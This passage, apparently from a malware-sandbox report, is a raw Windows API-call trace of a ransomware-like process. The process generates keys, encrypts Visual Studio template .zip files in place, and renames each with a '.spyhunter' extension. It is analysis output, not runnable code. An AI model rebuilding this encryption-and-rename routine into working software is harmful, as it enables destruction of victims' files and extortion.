HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.144] GetProcessHeap () returned 0x2c0000 [0165.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.144] GetProcessHeap () returned 0x2c0000 [0165.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88060 | out: hHeap=0x2c0000) returned 1 [0165.144] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce628 | out: pbBuffer=0x25ce628) returned 1 [0165.144] GetProcessHeap () returned 0x2c0000 [0165.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.144] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce620*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce620*=0x30) returned 1 [0165.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.145] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip") returned 112 [0165.145] StrStrW (lpFirst="Dataset.zip", lpSrch=".txt") returned 0x0 [0165.145] GetProcessHeap () returned 0x2c0000 [0165.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.145] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce5e4*=0x4a8, lpOverlapped=0x0) returned 1 [0165.295] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.295] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4a8, lpNumberOfBytesWritten=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce5e4*=0x4a8, lpOverlapped=0x0) returned 1 [0165.295] GetProcessHeap () returned 0x2c0000 [0165.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.295] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.295] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x25ce624*, lpNumberOfBytesWritten=0x25ce5e4*=0x4, lpOverlapped=0x0) returned 1 [0165.296] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5e4*=0x30, lpOverlapped=0x0) returned 1 [0165.296] CloseHandle (hObject=0x9c) returned 1 [0165.296] GetProcessHeap () returned 0x2c0000 [0165.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.296] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip.spyhunter") returned 122 [0165.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip.spyhunter")) returned 1 [0165.487] GetProcessHeap () returned 0x2c0000 [0165.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.487] GetProcessHeap () returned 0x2c0000 [0165.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.487] GetProcessHeap () returned 0x2c0000 [0165.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87df0 | out: hHeap=0x2c0000) returned 1 [0165.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce628 | out: pbBuffer=0x25ce628) returned 1 [0165.487] GetProcessHeap () returned 0x2c0000 [0165.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.488] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce620*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce620*=0x30) returned 1 [0165.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.563] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip") returned 111 [0165.563] StrStrW (lpFirst="UserControl.zip", lpSrch=".txt") returned 0x0 [0165.563] GetProcessHeap () returned 0x2c0000 [0165.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.564] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5e4*=0x59c, lpOverlapped=0x0) returned 1 [0165.719] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.719] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59c, lpNumberOfBytesWritten=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5e4*=0x59c, lpOverlapped=0x0) returned 1 [0165.719] GetProcessHeap () returned 0x2c0000 [0165.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.719] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.719] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x25ce624*, lpNumberOfBytesWritten=0x25ce5e4*=0x4, lpOverlapped=0x0) returned 1 [0165.720] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5e4*=0x30, lpOverlapped=0x0) returned 1 [0165.720] CloseHandle (hObject=0xa0) returned 1 [0165.720] GetProcessHeap () returned 0x2c0000 [0165.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.720] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip.spyhunter") returned 121 [0165.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip.spyhunter")) returned 1 [0165.721] GetProcessHeap () returned 0x2c0000 [0165.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.721] GetProcessHeap () returned 0x2c0000 [0165.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.721] GetProcessHeap () returned 0x2c0000 [0165.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eabf30 | out: hHeap=0x2c0000) returned 1 [0165.721] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce620 | out: pbBuffer=0x25ce620) returned 1 [0165.721] GetProcessHeap () returned 0x2c0000 [0165.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.721] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce618*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce618*=0x30) returned 1 [0165.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.722] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip") returned 104 [0165.722] StrStrW (lpFirst="Form.zip", lpSrch=".txt") returned 0x0 [0165.722] GetProcessHeap () returned 0x2c0000 [0165.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.722] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5dc*=0x585, lpOverlapped=0x0) returned 1 [0165.744] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.744] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x585, lpNumberOfBytesWritten=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5dc*=0x585, lpOverlapped=0x0) returned 1 [0165.745] GetProcessHeap () returned 0x2c0000 [0165.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.745] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.745] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x25ce61c*, lpNumberOfBytesWritten=0x25ce5dc*=0x4, lpOverlapped=0x0) returned 1 [0165.745] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5dc*=0x30, lpOverlapped=0x0) returned 1 [0165.745] CloseHandle (hObject=0xa0) returned 1 [0165.745] GetProcessHeap () returned 0x2c0000 [0165.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.745] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.spyhunter") returned 114 [0165.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip.spyhunter")) returned 1 [0165.746] GetProcessHeap () returned 0x2c0000 [0165.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.746] GetProcessHeap () returned 0x2c0000 [0165.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.746] GetProcessHeap () returned 0x2c0000 [0165.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7850 | out: hHeap=0x2c0000) returned 1 [0165.746] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce620 | out: pbBuffer=0x25ce620) returned 1 [0165.747] GetProcessHeap () returned 0x2c0000 [0165.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.747] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce618*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce618*=0x30) returned 1 [0165.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.747] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip") returned 113 [0165.747] StrStrW (lpFirst="EmptyDatabase.zip", lpSrch=".txt") returned 0x0 [0165.747] GetProcessHeap () returned 0x2c0000 [0165.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.748] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5dc*=0x341, lpOverlapped=0x0) returned 1 [0165.763] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffcbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.763] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x341, lpNumberOfBytesWritten=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5dc*=0x341, lpOverlapped=0x0) returned 1 [0165.763] GetProcessHeap () returned 0x2c0000 [0165.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.763] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.763] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x25ce61c*, lpNumberOfBytesWritten=0x25ce5dc*=0x4, lpOverlapped=0x0) returned 1 [0165.763] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5dc*=0x30, lpOverlapped=0x0) returned 1 [0165.763] CloseHandle (hObject=0xa0) returned 1 [0165.763] GetProcessHeap () returned 0x2c0000 [0165.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.763] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.spyhunter") returned 123 [0165.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip.spyhunter")) returned 1 [0165.765] GetProcessHeap () returned 0x2c0000 [0165.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.765] GetProcessHeap () returned 0x2c0000 [0165.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.765] GetProcessHeap () returned 0x2c0000 [0165.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87910 | out: hHeap=0x2c0000) returned 1 [0165.765] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce618 | out: pbBuffer=0x25ce618) returned 1 [0165.765] GetProcessHeap () returned 0x2c0000 [0165.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.765] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce610*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce610*=0x30) returned 1 [0165.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.766] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip") returned 107 [0165.766] StrStrW (lpFirst="DataSet.zip", lpSrch=".txt") returned 0x0 [0165.766] GetProcessHeap () returned 0x2c0000 [0165.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.766] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5d4*=0x499, lpOverlapped=0x0) returned 1 [0165.769] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.769] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5d4*=0x499, lpOverlapped=0x0) returned 1 [0165.769] GetProcessHeap () returned 0x2c0000 [0165.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.769] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.770] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x25ce614*, lpNumberOfBytesWritten=0x25ce5d4*=0x4, lpOverlapped=0x0) returned 1 [0165.770] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5d4*=0x30, lpOverlapped=0x0) returned 1 [0165.770] CloseHandle (hObject=0xa0) returned 1 [0165.770] GetProcessHeap () returned 0x2c0000 [0165.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.770] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.spyhunter") returned 117 [0165.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip.spyhunter")) returned 1 [0165.777] GetProcessHeap () returned 0x2c0000 [0165.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.778] GetProcessHeap () returned 0x2c0000 [0165.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0165.778] GetProcessHeap () returned 0x2c0000 [0165.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7728 | out: hHeap=0x2c0000) returned 1 [0165.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce618 | out: pbBuffer=0x25ce618) returned 1 [0165.778] GetProcessHeap () returned 0x2c0000 [0165.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0165.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce610*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce610*=0x30) returned 1 [0165.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.779] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip") returned 108 [0165.779] StrStrW (lpFirst="CodeFile.zip", lpSrch=".txt") returned 0x0 [0165.779] GetProcessHeap () returned 0x2c0000 [0165.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.779] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce5d4*=0x222, lpOverlapped=0x0) returned 1 [0165.781] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdde, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.781] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x222, lpNumberOfBytesWritten=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce5d4*=0x222, lpOverlapped=0x0) returned 1 [0165.781] GetProcessHeap () returned 0x2c0000 [0165.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.782] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.782] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x25ce614*, lpNumberOfBytesWritten=0x25ce5d4*=0x4, lpOverlapped=0x0) returned 1 [0165.782] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce5d4*=0x30, lpOverlapped=0x0) returned 1 [0165.782] CloseHandle (hObject=0xa0) returned 1 [0165.782] GetProcessHeap () returned 0x2c0000 [0165.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.782] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.spyhunter") returned 118 [0165.782] MoveFileW 